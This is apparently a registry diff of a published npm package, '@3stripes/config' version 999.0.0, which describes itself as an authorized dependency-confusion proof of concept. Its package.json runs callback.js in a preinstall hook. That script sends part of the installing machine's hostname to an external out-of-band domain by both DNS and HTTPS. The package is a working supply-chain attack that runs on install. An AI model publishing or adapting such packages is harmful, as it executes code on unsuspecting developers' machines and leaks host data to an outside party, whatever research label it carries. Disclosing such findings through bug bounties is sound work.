@3stripes/config 999.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +0 -0
- package/callback.js +38 -0
- package/index.js +6 -0
- package/package.json +16 -0
package/README.md
ADDED
|
File without changes
|
package/callback.js
ADDED
|
@@ -0,0 +1,38 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* SECURITY RESEARCH - Dependency Confusion PoC
|
|
3
|
+
*
|
|
4
|
+
* This is part of an AUTHORIZED bug bounty assessment.
|
|
5
|
+
* This script ONLY makes a DNS lookup to prove execution.
|
|
6
|
+
* No data is collected, exfiltrated, or modified.
|
|
7
|
+
*
|
|
8
|
+
* Researcher: Ashish (ashishkunwar280@gmail.com)
|
|
9
|
+
* Program: Adidas Private Bug Bounty (Bugcrowd)
|
|
10
|
+
*/
|
|
11
|
+
|
|
12
|
+
const dns = require('dns');
|
|
13
|
+
const https = require('https');
|
|
14
|
+
const os = require('os');
|
|
15
|
+
|
|
16
|
+
// REPLACE with your Burp Collaborator / interact.sh domain
|
|
17
|
+
const CALLBACK_DOMAIN = '2defa924e4f741393204gup1d5yyyyyyd.oast.site';
|
|
18
|
+
|
|
19
|
+
// Create a unique identifier (hostname hash, no PII)
|
|
20
|
+
const id = Buffer.from(os.hostname().slice(0, 8)).toString('hex').slice(0, 12);
|
|
21
|
+
const pkg = '3stripes-config';
|
|
22
|
+
|
|
23
|
+
// Method 1: DNS callback (most reliable, bypasses firewalls)
|
|
24
|
+
try {
|
|
25
|
+
dns.resolve(`${pkg}-${id}.${CALLBACK_DOMAIN}`, () => {});
|
|
26
|
+
} catch(e) {}
|
|
27
|
+
|
|
28
|
+
// Method 2: HTTP callback (backup, may be blocked by firewalls)
|
|
29
|
+
try {
|
|
30
|
+
const req = https.get(`https://${CALLBACK_DOMAIN}/${pkg}?h=${id}`, () => {});
|
|
31
|
+
req.on('error', () => {});
|
|
32
|
+
req.setTimeout(5000, () => req.destroy());
|
|
33
|
+
} catch(e) {}
|
|
34
|
+
|
|
35
|
+
// Log locally for debugging
|
|
36
|
+
console.log(`[Security Research] Dependency confusion PoC executed - ${pkg}`);
|
|
37
|
+
console.log(`[Security Research] Contact: ashishkunwar280@gmail.com`);
|
|
38
|
+
console.log(`[Security Research] This is part of an authorized bug bounty assessment.`);
|
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,16 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@3stripes/config",
|
|
3
|
+
"version": "999.0.0",
|
|
4
|
+
"description": "Security research - Dependency confusion proof of concept. This package is part of an authorized bug bounty assessment. Contact: ashishkunwar280@gmail.com",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node callback.js || true"
|
|
8
|
+
},
|
|
9
|
+
"keywords": ["security-research", "bug-bounty", "authorized-testing"],
|
|
10
|
+
"author": "Ashish <ashishkunwar280@gmail.com>",
|
|
11
|
+
"license": "ISC",
|
|
12
|
+
"repository": {
|
|
13
|
+
"type": "git",
|
|
14
|
+
"url": "https://github.com/security-research/dep-confusion-poc"
|
|
15
|
+
}
|
|
16
|
+
}
|